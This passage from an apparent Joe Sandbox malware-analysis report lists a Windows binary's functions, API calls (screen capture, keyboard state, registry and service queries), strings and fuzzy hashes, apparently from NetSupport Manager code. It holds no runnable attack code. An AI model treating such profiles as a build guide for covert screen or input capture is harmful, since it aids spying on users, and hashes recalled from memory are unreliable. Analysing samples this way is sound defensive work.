                                                                                          • SelectObject.GDI32(00000000,?), ref: 005C463A
                                                                                          • DeleteDC.GDI32(00000000), ref: 005C4647
                                                                                          • DeleteDC.GDI32(00000000), ref: 005C464A
                                                                                          • ReleaseDC.USER32(00000000,00000000), ref: 005C464F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Object$Select$CompatibleCreate$Delete$BitmapReleaseStretch
                                                                                          • String ID:
                                                                                          • API String ID: 3950507155-0
                                                                                          • Opcode ID: 02f29ce8f559b390a0325722f44cfa014ae40d9a38474154a251861d0155d354
                                                                                          • Instruction ID: 1660f7f1a5abcc8fdb4e06ae52c223041992132a7290c992d3ddbb2dd69fd33a
                                                                                          • Opcode Fuzzy Hash: 02f29ce8f559b390a0325722f44cfa014ae40d9a38474154a251861d0155d354
                                                                                          • Instruction Fuzzy Hash: B541E5B1A00209BFEB14DFA4DC99FEF7BB9EB49711F188119F905A3290D670AD408B75
                                                                                          Function 005CA490 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 96keyboardlibraryloaderCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetLastError.KERNEL32 ref: 005CA4AD
                                                                                          • wsprintfW.USER32 ref: 005CA4CF
                                                                                          • OutputDebugStringW.KERNEL32(?), ref: 005CA4DF
                                                                                            • Part of subcall function 005C55B0: GetTickCount.KERNEL32 ref: 005C5618
                                                                                          • GetModuleHandleW.KERNEL32(NSMTRACE.DLL), ref: 005CA4F7
                                                                                          • GetProcAddress.KERNEL32(00000000,NSMTraceFlush), ref: 005CA507
                                                                                          • OutputDebugStringW.KERNEL32(?), ref: 005CA54B
                                                                                          • GetVersion.KERNEL32 ref: 005CA556
                                                                                          • SetLastError.KERNEL32(?), ref: 005CA57D
                                                                                          • GetKeyState.USER32(00000011), ref: 005CA598
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: DebugErrorLastOutputString$AddressCountHandleModuleProcStateTickVersionwsprintf
                                                                                          • String ID: Exception caught at %x. Trying minidump.$NSMTRACE.DLL$NSMTraceFlush
                                                                                          • API String ID: 521685582-1300527790
                                                                                          • Opcode ID: 5da17e5ab0970593e54ab0230582fb3612d07cf73d4412ae68162ee2a1194bee
                                                                                          • Instruction ID: 03905d96814dedfbc64d502f5f6bcbd0d2640e2653d79d49b4fe506637d784ed
                                                                                          • Opcode Fuzzy Hash: 5da17e5ab0970593e54ab0230582fb3612d07cf73d4412ae68162ee2a1194bee
                                                                                          • Instruction Fuzzy Hash: B631E4B1900208AFDB14EBA0DC9DFDA7B79BB44704F04C1AAF519D3192EA709A40CFA1
                                                                                          Function 005B6680 Relevance: 19.6, APIs: 13, Instructions: 103windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetDC.USER32(00000000), ref: 005B6698
                                                                                          • CreateCompatibleDC.GDI32(00000000), ref: 005B66AD
                                                                                          • SelectObject.GDI32(00000000,?), ref: 005B66B6
                                                                                          • CreateCompatibleDC.GDI32(00000000), ref: 005B66C0
                                                                                          • GetObjectW.GDI32(?,00000018,?), ref: 005B66D5
                                                                                          • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 005B670E
                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 005B6719
                                                                                          • BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,00CC0020), ref: 005B673D
                                                                                          • SelectObject.GDI32(00000000,?), ref: 005B6748
                                                                                          • DeleteDC.GDI32(00000000), ref: 005B6755
                                                                                          • SelectObject.GDI32(00000000,?), ref: 005B675C
                                                                                          • DeleteDC.GDI32(00000000), ref: 005B6763
                                                                                          • ReleaseDC.USER32(00000000,00000000), ref: 005B6768
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Object$Select$CompatibleCreate$Delete$BitmapRelease
                                                                                          • String ID:
                                                                                          • API String ID: 1133104291-0
                                                                                          • Opcode ID: e1cc0f2d98b9613b11605a2e079aa7e46c029ede44cc23539aa2efd2c9bc8317
                                                                                          • Instruction ID: 14b9be4426b9982e8e0256b1cc1ff19c8eea58286fef01dddebd2261e65a77fe
                                                                                          • Opcode Fuzzy Hash: e1cc0f2d98b9613b11605a2e079aa7e46c029ede44cc23539aa2efd2c9bc8317
                                                                                          • Instruction Fuzzy Hash: 07310A75910219BFDB04DFA8DC89DEEBBB9EF4C711F14815AF905E7250D670AA40CBA0
                                                                                          Function 005D45E0 Relevance: 19.6, APIs: 13, Instructions: 97COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • IsDlgButtonChecked.USER32(?,00000428), ref: 005D4604
                                                                                          • EndDialog.USER32(?,00000428), ref: 005D4617
                                                                                          • GetDlgItem.USER32(?,00000427), ref: 005D4635
                                                                                          • GetDlgItem.USER32(?,00000428), ref: 005D463F
                                                                                          • SetForegroundWindow.USER32(?), ref: 005D4664
                                                                                          • EnableWindow.USER32(00000000,00000000), ref: 005D4681
                                                                                          • EnableWindow.USER32(?,00000000), ref: 005D468D
                                                                                          • ShowWindow.USER32(00000000,00000000), ref: 005D469C
                                                                                          • ShowWindow.USER32(?,00000000), ref: 005D46A4
                                                                                          • GetDlgItem.USER32(?,00000426), ref: 005D46AE
                                                                                          • ShowWindow.USER32(00000000), ref: 005D46B1
                                                                                          • CheckDlgButton.USER32(?,00000428,00000001), ref: 005D46C7
                                                                                          • EnableWindow.USER32(00000000,00000000), ref: 005D46D0
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Window$EnableItemShow$Button$CheckCheckedDialogForeground
                                                                                          • String ID:
                                                                                          • API String ID: 1869407622-0
                                                                                          • Opcode ID: e32ae378e93477d29731edc0c55e0556b63025a48a91a8e578e582e75c72fdbf
                                                                                          • Instruction ID: b7bcd5960b67562eba3d9b915b4dff13ad0269d4bb9d835250e09b9a7bcfaaf9
                                                                                          • Opcode Fuzzy Hash: e32ae378e93477d29731edc0c55e0556b63025a48a91a8e578e582e75c72fdbf
                                                                                          • Instruction Fuzzy Hash: 7A21B4326412046BEB205B68EC45FEE7BADEF49B11F048027F605DB290C775E8418B79
                                                                                          Function 005B6780 Relevance: 19.6, APIs: 13, Instructions: 94windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetDC.USER32(00000000), ref: 005B6798
                                                                                          • CreateCompatibleDC.GDI32(00000000), ref: 005B67B8
                                                                                          • SelectObject.GDI32(00000000,?), ref: 005B67C2
                                                                                          • CreateCompatibleDC.GDI32(00000000), ref: 005B67C8
                                                                                          • GetObjectW.GDI32(?,00000018,?), ref: 005B67D6
                                                                                          • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 005B67E5
                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 005B67F0
                                                                                          • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 005B6816
                                                                                          • SelectObject.GDI32(00000000,?), ref: 005B6821
                                                                                          • DeleteDC.GDI32(00000000), ref: 005B682A
                                                                                          • SelectObject.GDI32(?,?), ref: 005B683A
                                                                                          • DeleteDC.GDI32(?), ref: 005B6840
                                                                                          • ReleaseDC.USER32(00000000,00000000), ref: 005B6845
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Object$Select$CompatibleCreate$Delete$BitmapRelease
                                                                                          • String ID:
                                                                                          • API String ID: 1133104291-0
                                                                                          • Opcode ID: fb31534f5ebca9cfd7b7f3b5dcfc9bcf95ab9e279d64230493ea1db293e21bc8
                                                                                          • Instruction ID: 96073e704b63d1191cf686fa86b925424e5d98eb2318ba89014a985475337f37
                                                                                          • Opcode Fuzzy Hash: fb31534f5ebca9cfd7b7f3b5dcfc9bcf95ab9e279d64230493ea1db293e21bc8
                                                                                          • Instruction Fuzzy Hash: 4C31F975A00218BFDB10DFA9DC85EEEBBBDEB48711F14815AF904E7240D674AE418BA4
                                                                                          Function 005C92B0 Relevance: 19.5, APIs: 3, Strings: 8, Instructions: 214registryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetVersionExW.KERNEL32(0063BEF0,00000000), ref: 005C92E0
                                                                                          • RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 005C931F
                                                                                            • Part of subcall function 005C37C0: RegQueryValueExW.ADVAPI32(00000000,?,?,00000000,00000000,00000000,?,00000000,752F55F0,?,005C9375,00000000,CSDVersion,00000000,00000000,?), ref: 005C37E0
                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 005C9528
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CloseOpenQueryValueVersion
                                                                                          • String ID: ($CSDVersion$CurrentBuild$CurrentMajorVersionNumber$CurrentMinorVersionNumber$CurrentVersion$SOFTWARE\Microsoft\Windows NT\CurrentVersion$Service Pack
                                                                                          • API String ID: 2996790148-592434882
                                                                                          • Opcode ID: bd0dbb6a97489ee9c34af2ce83880c8744e2ea6af2a010b0c8c141b0504c28b0
                                                                                          • Instruction ID: e52219bad592430f3d360c3910f27ccc45f2784e491bb5a945f6b9a1dca4a9e2
                                                                                          • Opcode Fuzzy Hash: bd0dbb6a97489ee9c34af2ce83880c8744e2ea6af2a010b0c8c141b0504c28b0
                                                                                          • Instruction Fuzzy Hash: 0271A2B1E0021A9FEB25DBA5DC4AFEE77B5BF44700F01409DEA0966181E7B09E44CF91
                                                                                          Function 005E6794 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 206libraryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 005E680D
                                                                                          • LoadLibraryA.KERNEL32(?), ref: 005E6886
                                                                                          • GetLastError.KERNEL32 ref: 005E6892
                                                                                          • RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 005E68C5
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ExceptionRaise$ErrorLastLibraryLoad
                                                                                          • String ID: $
                                                                                          • API String ID: 948315288-3993045852
                                                                                          • Opcode ID: b90f48c60e87dca7206f4084ac2bac8c06f4ef156f790724ed9ef2da9beaf508
                                                                                          • Instruction ID: de83b67b25084c45a200a6e889f08d0ba4e702aa49cdee61299d68d84219795c
                                                                                          • Opcode Fuzzy Hash: b90f48c60e87dca7206f4084ac2bac8c06f4ef156f790724ed9ef2da9beaf508
                                                                                          • Instruction Fuzzy Hash: 27817D75A00206AFDB14CFA9C894AADBBF5FF68390F148029E955E7251EB70E944CB60
                                                                                          Function 005A8650 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 179serviceCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000001,DE64E134), ref: 005A868E
                                                                                          • OpenServiceW.ADVAPI32(00000000,?,00000001), ref: 005A86B1
                                                                                          • QueryServiceConfigW.ADVAPI32(00000000,00000000,00000000,?), ref: 005A86D4
                                                                                          • GetLastError.KERNEL32 ref: 005A86D8
                                                                                          • QueryServiceConfigW.ADVAPI32(?,00000000,?,?), ref: 005A8707
                                                                                          • GetLastError.KERNEL32 ref: 005A87EB
                                                                                          • CloseServiceHandle.ADVAPI32(00000000), ref: 005A8821
                                                                                          • CloseServiceHandle.ADVAPI32(00000000), ref: 005A882E
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Service$CloseConfigErrorHandleLastOpenQuery$Manager
                                                                                          • String ID: /$QueryServiceConfig() failed! $ServicesActive
                                                                                          • API String ID: 3464625493-543094129
                                                                                          • Opcode ID: ab5ee43842f836d77add9d0394ec614cb29fd8d2dc67d4b505daf249e2c74896
                                                                                          • Instruction ID: 060ed308554bfb0c84daa535b71a5adb5d22d5ef290c7364a6836951c8629ec9
                                                                                          • Opcode Fuzzy Hash: ab5ee43842f836d77add9d0394ec614cb29fd8d2dc67d4b505daf249e2c74896
                                                                                          • Instruction Fuzzy Hash: E9518271D00219ABDB14DBA4DC85FEEBBB9FF89700F144119F912A7251EF75A904CBA0
                                                                                          Function 005B6D70 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 87COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: GlobalLock
                                                                                          • String ID: ..\CTL32\pcibmp.cpp$lpDIBHdr
                                                                                          • API String ID: 2848605275-3862004634
                                                                                          • Opcode ID: 4fb4d857c519a7239f4ebb796b637f1f496ca541665e7f5515fb1acbb6389bd8
                                                                                          • Instruction ID: 2e17b0ca1ca02b6355e85de671777c7170a07708de51bcf30d3c219eeeffaa1b
                                                                                          • Opcode Fuzzy Hash: 4fb4d857c519a7239f4ebb796b637f1f496ca541665e7f5515fb1acbb6389bd8
                                                                                          • Instruction Fuzzy Hash: 3A21C3767402057BD7209BB5AC5EFEB7BADEB85761F148066FE08D6240DA31D90086B1
                                                                                          Function 00597020 Relevance: 17.8, APIs: 6, Strings: 4, Instructions: 304COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • EnterCriticalSection.KERNEL32(?,DE64E134), ref: 00597099
                                                                                          • ExpandEnvironmentStringsW.KERNEL32(?,?,?,?,?,DE64E134), ref: 005971D6
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CriticalEnterEnvironmentExpandSectionStrings
                                                                                          • String ID: ..\CTL32\Config.cpp$@$_present$buflen >= sizeof (TCHAR)
                                                                                          • API String ID: 1631139872-3711079296
                                                                                          • Opcode ID: d407b2e3e3968ff247beb14d07144ace533cb30f36c8e3ab359991f855311c47
                                                                                          • Instruction ID: 565d7698a2f82afe65c1ceac0bcdb86a0e0503df4b3fc9070b018eaf7b7b95ca
                                                                                          • Opcode Fuzzy Hash: d407b2e3e3968ff247beb14d07144ace533cb30f36c8e3ab359991f855311c47
                                                                                          • Instruction Fuzzy Hash: 58B1D67191421D9BCF24DF64CC89BEABBB5FF98310F14499AE81A97250E770AE40DBD0
                                                                                          Function 00594A10 Relevance: 17.7, APIs: 4, Strings: 6, Instructions: 218registryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • wsprintfW.USER32 ref: 00594A70
                                                                                          • wsprintfW.USER32 ref: 00594A83
                                                                                            • Part of subcall function 005B4990: RegOpenKeyExW.ADVAPI32(?,80000002,00000000,00596384,?,00000000,752F55F0,00000010,?,00596384,80000002,?,00020019), ref: 005B49AC
                                                                                            • Part of subcall function 005B49E0: RegCreateKeyExW.ADVAPI32(00000000,0002001F,00000000,00000000,80000001,?,005959EC,?,00000000,?,00000000,752F55F0,?,?,005959EC,80000001), ref: 005B4A0B
                                                                                          • RegDeleteKeyW.ADVAPI32(80000001,?), ref: 00594C2C
                                                                                          • RegSetValueExW.ADVAPI32(?,nssCurrConfig,00000000,00000001,?,?,?,?,0002001F,00000000,00000000,80000001,?,00020019), ref: 00594CD4
                                                                                            • Part of subcall function 005E7CA4: RtlAllocateHeap.NTDLL(00000000,00000001,00000000,?,752F55F0,?,005B97EE,00000000,?,?), ref: 005E7CE9
                                                                                            • Part of subcall function 005B45B0: RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,005947BC,00000000,00000000), ref: 005B45F5
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Valuewsprintf$AllocateCreateDeleteEnumHeapOpen
                                                                                          • String ID: %s\ConfigList\%s$@$CurrConfig$IsA()$e:\nsmsrc\nsm\1410\1410\ctl32\NSMString.h$nssCurrConfig
                                                                                          • API String ID: 1914631338-2895001147
                                                                                          • Opcode ID: 135273485f984f5e6c1e71871c86873d7dad1b60e68755a9504a456fedde9f59
                                                                                          • Instruction ID: aa775d54177fd8eb28b2aca1dfc3446d4aa3fe7de642303b4be2109711fa2de4
                                                                                          • Opcode Fuzzy Hash: 135273485f984f5e6c1e71871c86873d7dad1b60e68755a9504a456fedde9f59
                                                                                          • Instruction Fuzzy Hash: 7A8160B1900219AFDF24DB54CC95FEAB778FF85314F044199E609A7242EB70AE84CFA5
                                                                                          Function 005AE7C0 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 186COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 005AE7F3
                                                                                          • GetFileVersionInfoSizeW.VERSION(?,?), ref: 005AE829
                                                                                          • GetFileVersionInfoW.VERSION(?,?,00000000,00000000), ref: 005AE859
                                                                                          • VerQueryValueW.VERSION(00000000,\StringFileInfo\040904e4\ProductVersion,?,?,?,?,00000000,00000000), ref: 005AE87A
                                                                                          • VerQueryValueW.VERSION(00000000,\StringFileInfo\080904b0\ProductVersion,?,?,00000000,\StringFileInfo\040904e4\ProductVersion,?,?,?,?,00000000,00000000), ref: 005AE897
                                                                                          • VerQueryValueW.VERSION(00000000,\StringFileInfo\040904b0\ProductVersion,?,?,00000000,\StringFileInfo\080904b0\ProductVersion,?,?,00000000,\StringFileInfo\040904e4\ProductVersion,?,?,?,?,00000000,00000000), ref: 005AE8B4
                                                                                          Strings
                                                                                          • \StringFileInfo\040904b0\ProductVersion, xrefs: 005AE8AE
                                                                                          • \StringFileInfo\040904e4\ProductVersion, xrefs: 005AE874
                                                                                          • \StringFileInfo\080904b0\ProductVersion, xrefs: 005AE891
                                                                                          • \gdihook5.dll, xrefs: 005AE814
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: QueryValue$FileInfoVersion$DirectorySizeSystem
                                                                                          • String ID: \StringFileInfo\040904b0\ProductVersion$\StringFileInfo\040904e4\ProductVersion$\StringFileInfo\080904b0\ProductVersion$\gdihook5.dll
                                                                                          • API String ID: 2940572272-296312680
                                                                                          • Opcode ID: 270d710013cd075e8ddd728d170dac858c917f81193d488636adabdc7db59c69
